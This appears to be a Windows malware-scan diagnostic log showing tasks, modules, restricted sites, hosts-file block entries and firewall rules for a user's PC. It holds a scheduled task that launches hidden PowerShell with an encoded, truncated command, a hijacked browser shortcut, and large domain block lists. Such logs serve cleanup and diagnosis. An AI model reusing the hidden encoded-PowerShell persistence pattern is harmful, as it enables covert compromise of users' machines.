Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - System32\Tasks\{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9436 more characters).
Task: {F3AF02E3-81A9-485B-B1B6-519881BEBF51} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-12] (Microsoft Corporation)
Task: {F90E1ADE-C9DD-4465-8DAC-587FA30703FB} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-07-02] (Avast Software s.r.o.)
Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157
==================== Loaded Modules (Whitelisted) ==============
2015-07-10 21:00 - 2015-07-10 21:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-08-09 19:24 - 2015-08-09 19:24 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-05-15 16:26 - 2015-05-15 16:26 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-09-15 14:25 - 2015-09-15 14:25 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-19 18:35 - 2015-08-11 19:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-11-05 10:11 - 2015-11-05 10:12 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2014-09-10 18:09 - 2005-04-22 14:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-09-15 14:58 - 2015-09-15 14:58 - 08901184 _____ () D:\Microsoft Office 2013\Office15\1033\GrooveIntlResource.dll
2015-10-01 14:23 - 2015-09-17 15:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 20:59 - 2015-07-10 20:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2015-12-15 18:55 - 2015-11-25 14:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-15 18:55 - 2015-11-25 14:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-15 18:55 - 2015-11-25 14:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-01 14:23 - 2015-09-17 15:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-03-07 10:07 - 2015-03-07 10:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2015-07-02 10:28 - 2015-07-02 10:28 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 10:07 - 2015-03-07 10:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2015-07-02 10:28 - 2015-07-02 10:28 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2015-06-25 16:34 - 2015-06-25 16:34 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2015-06-25 16:37 - 2015-06-25 16:37 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-06-25 16:35 - 2015-06-25 16:35 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2015-06-25 16:38 - 2015-06-25 16:38 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-06-25 15:53 - 2015-06-25 15:53 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2015-06-25 15:51 - 2015-06-25 15:51 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2015-12-21 17:55 - 2015-12-21 17:55 - 00292352 _____ () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
2015-07-02 13:20 - 2015-07-02 13:20 - 00104400 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2015-07-02 13:20 - 2015-07-02 13:20 - 00081728 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-02-29 19:32 - 2016-02-29 19:32 - 02835456 _____ () C:\Program Files\AVAST Software\Avast\defs\16022900\algo.dll
2016-02-28 18:50 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-02-28 18:50 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-02-28 18:50 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-02-28 18:50 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-02-26 06:50 - 2016-02-18 14:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
2016-02-26 06:50 - 2016-02-18 14:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
2015-02-19 13:47 - 2001-07-26 15:17 - 00692224 _____ () D:\Internode\libeay32.dll
2015-02-19 13:47 - 2001-07-26 15:18 - 00151552 _____ () D:\Internode\ssleay32.dll
2015-07-02 13:20 - 2015-07-02 13:20 - 40540672 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2015-11-16 20:48 - 2015-11-16 20:48 - 00137728 _____ () C:\ProgramData\Razer\Synapse\CrashReporter\CrashRpt1402.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 40622592 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libcef.dll
2015-04-03 17:51 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 50656768 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libcef.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 01874944 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libglesv2.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 00075264 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libegl.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 00911360 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libglesv2.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 00134144 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com
There are 7870 more sites.
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123simsen.com -> www.123simsen.com
There are 7870 more sites.
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-14 12:34 - 2016-02-28 21:02 - 00450902 ____R C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 www.007guard.com
127.0.0.1 007guard.com
127.0.0.1 008i.com
127.0.0.1 www.008k.com
127.0.0.1 008k.com
127.0.0.1 www.00hq.com
127.0.0.1 00hq.com
127.0.0.1 010402.com
127.0.0.1 www.032439.com
127.0.0.1 032439.com
127.0.0.1 www.0scan.com
127.0.0.1 0scan.com
127.0.0.1 1000gratisproben.com
127.0.0.1 www.1000gratisproben.com
127.0.0.1 1001namen.com
127.0.0.1 www.1001namen.com
127.0.0.1 100888290cs.com
127.0.0.1 www.100888290cs.com
127.0.0.1 www.100sexlinks.com
127.0.0.1 100sexlinks.com
127.0.0.1 10sek.com
127.0.0.1 www.10sek.com
127.0.0.1 www.1-2005-search.com
127.0.0.1 1-2005-search.com
127.0.0.1 123fporn.info
127.0.0.1 www.123fporn.info
127.0.0.1 123haustiereundmehr.com
127.0.0.1 www.123haustiereundmehr.com
127.0.0.1 123moviedownload.com
127.0.0.1 www.123moviedownload.com
There are 15468 more lines.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\Control Panel\Desktop\\Wallpaper -> c:\users\kym\appdata\local\packages\microsoft.windows.photos_8wekyb3d8bbwe\localstate\photosappbackground\20150215_012121688_ios.jpg
DNS Servers: 82.163.143.171 - 82.163.142.173
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\StartupApproved\StartupFolder: => "Open Broadcaster Software (32bit) (2).lnk"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{48CEB542-655B-422A-B09D-BFDF5ACFC2DE}] => (Allow) D:\Microsoft Office 2013\Office15\outlook.exe
FirewallRules: [{07CF4E87-E18E-4151-AF15-6E0D5A61CD56}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
FirewallRules: [{E6424F0D-1043-4F45-ABB4-54594825877D}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
FirewallRules: [{B087B5F1-8B72-4FCA-A5C4-EEF672EB226F}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
FirewallRules: [{2E96B917-6E0A-4C39-8FAF-CF6991B7A9E9}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
FirewallRules: [{0A42A4D6-702C-4A20-AAA8-66BCB8F63F6A}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{CFA461BE-DE59-4B87-B67F-48577B41F94D}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{9B2F8065-74C1-4CF4-9AB6-785709683C8B}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{C93BD8EB-D0F0-4077-9B6B-DAC6C0EA78AA}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{9A785830-F8A4-4C14-98FF-EA82E1D9D900}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{33391FC5-0E44-44F8-AD28-5F02628A1093}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{0A22C041-F41D-42C3-B571-A70B35DBF973}] => (Allow) LPort=54925
FirewallRules: [UDP Query User{252EAFA3-7210-44C6-8374-ACA676045C0B}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{2877E791-1CCB-42A5-86E9-438A16014E27}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5F0F31E8-3F0B-46EB-B0D3-CA4A50E24B45}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
FirewallRules: [TCP Query User{784D8C91-CAAD-4BAF-9AB8-C4D37B5348F8}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
FirewallRules: [{A3B20735-B836-4096-92B1-7F605DD53102}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{2E30376F-B970-46BD-8899-EB16CBD57F77}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{56C40FDB-D1D8-4300-9444-462D37777935}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
FirewallRules: [{BB33C2C8-BD13-4B46-AB4B-945AB63AD76D}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
FirewallRules: [UDP Query User{181AB5DD-4B58-40DC-83A7-E0220CA18F90}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{DF812EF1-9277-44ED-85D2-17CC01EE6A83}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [{86532A14-A6CC-4BFC-BD35-2C868592B80F}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{AB156E35-4ABB-46D8-9882-87F8777E7C40}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{CB0E2CEA-ECBD-49C7-B03C-B09F6B9E5F82}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{4A7C1317-3631-4AA3-8955-49385287E4E4}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{E5F6F467-33E1-4473-8BF5-7B02CF2F6AE5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{DD2E394F-C0A9-4BE1-8B27-F31AEDB8A861}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{FCBC243E-7F87-40E3-BDFE-602D2F7F8F84}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{F85EFD68-AFA7-42E0-9EB7-24BC00055581}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{DC23B312-10EB-4DEC-96E0-43DA215B3471}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{1A7C934B-D0B9-45AC-A983-43FF06786E6D}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{E195526E-E66B-41A6-8D03-D693704045EA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{757BAA93-318B-49C6-A2AF-697C8B020683}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [UDP Query User{5A46E22D-A3AA-4D71-9164-4444349A2E37}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{8D040A27-B2B3-48B2-AE4D-CF5A6B2B9575}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [{F2975338-B532-432A-8BB2-E7257A66FB37}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{A92059AE-40CC-4490-B046-D5E8EB1EA379}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{E73880A3-C095-497C-BB99-0FF4F9A222C4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{297EF2CF-1068-49B7-945F-7F71EA277019}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{4A156579-629D-40A0-AD60-DAF22460B1A0}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
FirewallRules: [{895120DB-A4F1-47CE-9070-457BFAE3272C}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
FirewallRules: [{AB2CC394-E9FE-498E-A877-0661AB134F15}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{9ECAEE5C-41DF-4173-9FD7-BF8A01B28AF5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{0740F5E2-B69A-40E8-8DD2-D95CC993A671}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{BAF0FA59-C99C-4003-97DC-FE0050EAE7E6}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{59C72BBD-55D5-46BB-9D94-83EC35F8C1E6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [{CDB3FF16-5E27-45A8-A944-246B3448C710}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [{15B898B7-E0CD-4607-B1C4-DCA61C30BAF4}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{F07CB940-6D92-4342-9696-AAD6C596DB2D}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{759D3D16-BF79-4EB7-A210-0BE0F00D3DE2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{9BF516F4-E2B1-4F2F-A84D-B7092B2B122E}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{E1DBBBC1-157A-4212-B0D2-AA4DC1A3B620}] => (Allow) LPort=54925
FirewallRules: [{2250328F-7FF9-4F66-94E8-EE8BCBBF5767}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{EF4512A5-DBBF-48C4-B269-B56A1B629D96}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{5E0948FB-AB6B-4342-9299-E743A7E82CD5}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
FirewallRules: [{24639D5A-3321-4183-A818-D896BC8761C8}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
FirewallRules: [{F9551992-B61C-4405-BC17-71BDF9CF57AD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{4C4131C5-3599-4D91-8FDE-E5FC28727831}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{E0C0796F-728A-4514-96B3-64E78C3581F7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{BFAD5EDC-8BE9-42A3-94D2-D4C8457134B0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{F80F90B0-6FF0-4F96-9E65-E042003CE976}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{CE810206-FB49-40BF-B541-9EE0F88FCE29}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{F7CE0552-38B5-4F44-9E96-7E7CD1C904DF}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{B4DB672A-158E-45E5-B3B8-D4A3F5026452}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{F4BE57AB-8465-4DAD-8924-6FF609FD1D75}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [{756ED978-037A-4F3D-A428-E87DAF9720E2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [UDP Query User{5C458673-1B35-424D-BAA3-78CAA5394D57}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
FirewallRules: [TCP Query User{E50AE07B-9053-4BF0-89FE-8539B27A5423}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
FirewallRules: [{5D946922-67D2-47E1-8E89-CBFE1C6345B1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [{4F7B44EC-2514-42B8-B292-F088413D9EEC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [UDP Query User{CB540F47-8AB3-4B36-B34A-E3824B1FED40}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
FirewallRules: [TCP Query User{FE0A9CD1-00B6-4747-9F1C-755ACCB4C879}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
FirewallRules: [{8E6EEA97-8D35-486D-B2B6-A2E9F8BF338C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{A3FE7E6A-1E6C-4E76-A75D-A4D1DCA0EDC0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{769BECB0-54E0-47E7-9759-ECAF2E28273D}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
FirewallRules: [{7B0D63B9-31A4-4ADB-8F22-69D31A83D9B8}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
FirewallRules: [{3B9FA9A3-38E7-41D2-88A1-0BB43DE029BD}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{74A436A7-8819-4F18-8F60-716D8A0E357E}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{48B12E80-9B0D-46D9-A92C-7D542E713519}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{B1560556-55E2-42A6-A2E3-F65F2A7A5E97}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{75F5A6EB-BD39-4FE4-A690-4ABD347FD037}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{099743C1-9DF8-4750-949F-761AC80ABAC6}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
